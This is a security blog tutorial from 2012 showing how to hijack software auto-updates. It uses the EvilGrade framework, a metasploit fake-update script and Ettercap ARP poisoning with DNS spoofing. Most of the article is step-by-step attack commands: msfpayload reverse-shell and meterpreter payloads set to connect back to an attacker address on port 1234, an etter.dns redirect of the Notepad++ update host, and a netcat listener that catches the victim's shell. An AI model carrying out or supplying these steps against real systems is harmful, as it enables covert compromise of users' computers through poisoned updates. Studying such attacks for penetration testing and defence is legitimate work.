Hacking

Hacking AutoUpdate by Injecting Fake Updates

Hari Krishnan
April 26, 2012 by
Hari Krishnan

Works against Java, AppleUpdate, Google Analytics, Skype, Blackberry and more

Introduction

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

We all know that hackers are constantly trying to steal private information by getting into the victim's system, either by exploiting the software installed in the system or by some other means. According to one stat, more than 60 percent of Adobe Reader users have unpatched versions, leaving them vulnerable to attacks. By performing routine updates for their software, consumers can protect themselves, patching known vulnerabilities and therefore greatly reducing the chance of getting hacked.

Commonly used software, such as MS Office, Adobe Flash and PDF reader (as well as the browsers themselves) are the major targets for exploits if left unpatched. In the past, fake patches for Firefox, IE, etc. displayed messages informing users that updated versions for a plugin or the browser were available, prompting the user to update their software. For example, the page will tell the user that updating their Flash version is critical.  Once the user clicks the fake update, it will download malicious content (like, for example, the Zeus Trojan) to the victim's computer, as well as perhaps a rogue anti-virus, asking the user to pay in order to remove the infections. Similar attacks have been done in the past for various browsers, too.

Normally, if there is an update for the Firefox browser, the update notifications are displayed as popups rather than webpages. A better way to check for any update in Firefox is go to the Help optionàselect "about Firefox." If the browser needs an update, it will display something that says "apply update."


If you are not sure about your applications,

  1. Do check their official website or the particular application website.
  2. For checking updates, goto the URL http://www.mozilla.org/en-US/plugincheck/. The Url generally scans your Firefox for any updates for the installed plugins and gives information saying like if the plugin is vulnerable or need updating or it status.


Most people avoid updating since it can be annoying at times. But if we are handling sensitive information in our systems, then updating and patching up the important software should be of high priority.

When you think about it, how many people are really cautious about the updates, the type of update or the link from where they are downloading and installing the update? Obviously, there are very few people that are really cautious and vigilant about updates, therefore making the success rates for those exploiting the users high. One effective way of exploiting users is by using tools like EvilGrade.

Before moving on to EvilGrade, let's have a look at a bash script which can automate Manning in the Middle and exploit the user by providing a fake update. This is done by setting up a DHCP and web server. Once that is done, create an exploit using msf and wait for the victim to connect to your fake update server and run the exploit. Once the fake update has been executed, the victim's pc gets exploited and grants access to surf the victim's system. We can also have options like sniffing, using the dnsiff suite, in order to spy on the victim.

We can extract the bash script via tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz and copy to the 'www' folder to /var/www (cp www/* /var/www/).Now edit the metasploit-fakeupdate.sh with your "internet"interface. And bash metasploit-fakeupdate.sh. Once these steps are performed, wait for the target to connect for further exploitation.

The commands are as follows

tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz

cd metasploit-fakeUpdate[v0.1.4]

cp www/* /var/www

ifconfig

kate metasploit-fakeUpdate.sh

bash metasploit-fakeUpdate.sh

About EvilGrade:

EvilGrade is a framework which the exploits weaknesses in the auto-update services of multiple common software packages and the attack performed by this framework is one of the best example for client exploitation. This framework tricks the service into believing there is a signed update available for the product, thus prompting the user to install the upgrade where the upgrade is the attacker's payload. This type of attack is a bit difficult for a normal user to detect since they don't see anything suspicious and the upgrade looks legitimate.

We can use this framework with the combination of DNS spoofing or Man-in-the-middle attack in order to spoof the software upgrade. This therefore tricks the victim into downloading the upgrade, thereby executing our malicious arbitrary code.

The EvilGrade supports various famous software like Notepad, iTunes, Java plug-in, WinZip, Winamp, DAP, OpenOffices, LinkedIn, Speedbit, etc.

Evilgrade takes the advantage of various applications because most of these verify neither the update contents nor the master update server. Basically, in this type of attack, the attacker seeks to modify the DNS traffic of the victim and return them to some other ip address controlled by the attacker.

General update process scenario:

An Application starts the update process and tries to request from its dns server host (like, for example update.notepadplus.com). The DNS server also replies with some information. Now the application gets the file lastupdate.xml from update.app1.com and the Application analyzes the update file. If it detects a new update, it will then install it.


Sample figure of general update process

You can download the ISR-evilgrade from http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz

Steps to install EvilGrade:

Step 1: Download and extract the EvilGrade http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz. To extract, the command is

tar xvfz isr-evilgrade-2.0.0.tar.gz

Step 2: Download the required Perl module if necessary and run the evilgrade by using the command

$. /evilgrade

Note: Sometime, while running EvilGrade, we may get some error like below

Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.

To solve this, run the command in terminal cpan Data::Dump


Before attacking the target machine, we may need to investigate the target application. We'll need to create a fake update using EvilGrade to inject into the victim's computer.

To list the supported application, use the command show modules in the console; shown below are the listed modules.

allmynotes

amsn

appleupdate

apptapp

apt

atube

autoit3

bbappworld

blackberry

bsplayer

ccleaner

clamwin

cpan

cygwin

dap

divxsuite

express_talk

fcleaner

filezilla

flashget

flip4mac

freerip

getjar

gom

googleanalytics

growl

isopen

istat

itunes

jet

jetphoto

linkedin

miranda

mirc

nokia

nokiasoftware

notepadplus

openoffice

opera

orbit

osx

paintnet

panda_antirootkit

photoscape

quicktime

skype

sparkle

speedbit

sunbelt

sunjava

superantispyware

teamviewer

techtracker

trillian

ubertwitter

vidbox

virtualbox

vmware

winamp

winscp

winupdate

winzip

yahoomsn


In this example, let's target the software-notepad ++ by creating a malicious upgrade. To configure a specified module, the simple command would be

evilgrade>configure notepadplus

To view the options for the selected module, use the command "show options".


Note: Here in the image, the "VirtualHost" address is important – it will be used later on to perform the attack.

The next step would be setting up the agent. The agent is nothing more than our fake update binary. We will have to set the path to where it's located; we can also create and implement a dynamic fake update binary generation, where we will be able to generate any payload of Metasploit or use any other interface to create the binary. We can configure the agent with our payload using msfpayload like, for example, shell_reverse_tcp. We can create the payload and use them either within the EvilGrade console or else create a payload outside the framework and then call it when required.

Method 1: To create the payload within EvilGrade, the command which we are going to use is

evilgrade (notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.75.130 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

Here, we are setting up the fake update binary with the payload "windows/shell_reverse_tcp" using a reverse shell to connect at address 192.168.75.130(attacker's ip address ) port 1234. The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated.

Method 2: Create a payload outside the EvilGrade using msfpayload.

[root@bt]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.75.130 LPORT=1234 X > /tmp/reverse-shell.exe

Now, we can call this payload within EvilGrade by the following command.

evilgrade(notepadplus)>set agent /tmp/reverse-shell.exe


Once this is all set, we need to start the EvilGrade server. This is done again by a simple command named start.

Now the server has been started. The next step would be configuring the Man in the Middle attack using Ettercap. As I said earlier, EvilGrade, along with the combination of DNS spoofing or Man-in-the-middle attack, can be used to trick the victim. So let's configure etter.dns.

pico /usr/share/ettercap/etter.dns


Here we need to change the VirtualHost address to our ip address i.e., notepad-plus.sourceforge.net = attacker's ip address.

Once its configured, let's fire up the Ettercap, since it's a good tool for performing MITM attacks over the LAN.

To fire up the Ettercap, type the command in the terminal – ettercap –G

Click Sniff –> Unified sniffing –> choose your network interface card. Here its eth0


Once your network interface card is selected, enable the dns_spoof plugin by double clicking on it. This plugin can be used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof.


Now let's scan hosts in our network. Click Hosts –> Scan for hosts.


Once the scan for host is performed, select host list to view the hosts found in the network. The result would be similar to this


We also need to perform an MIMT attack to intercept all data on network. Click Mitm –> Arp poisoning –> check "Sniff remote connection". Before we start sniffing, there is another important thing we should do to setup the target. Add the router address to target 1 by clicking "Add to Target 1" and similarly victim's ip address to target 2 by clicking "Add to target 2".

Once the sniffing has started, use Netcat for listening to the particular port defined in the Evilgrade. In this case, it is 1234.


Now, just wait for the victim to open his/her notepad plus. Once they open, they will get a pop up asking for update. If the victim follows through with the upgrades, you will be getting their shell from where we can further exploit them or something else, depending on your imagination.

    

Conclusion:

EvilGrade is a very powerful tool for penetrating in to a remote system. With the help of tools like ettercap, its lethality is further enhanced. The framework is platform independent, i.e. the tool can penetrate any system whose update session can be hijacked. Mitigation for this kind of attack hasn't been cent percent achieved. One protection against this could be for the user to simply steer clear of any update coming from an unknown network.

The best part of this tool is that the attack is not meant only for attacking Windows systems, but any vulnerable update mechanism. The only thing that the attacker has to do is hijack the update process on a targeted computer over the network. After that, game over.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.


Hari Krishnan
Hari Krishnan

Hari Krishnan works as a security and bug researcher for a private firm, as well as InfoSec Institute. His interests largely encompass web application security issues. Hari is also an organizer for Defcon Chennai (http://www.defcontn.com).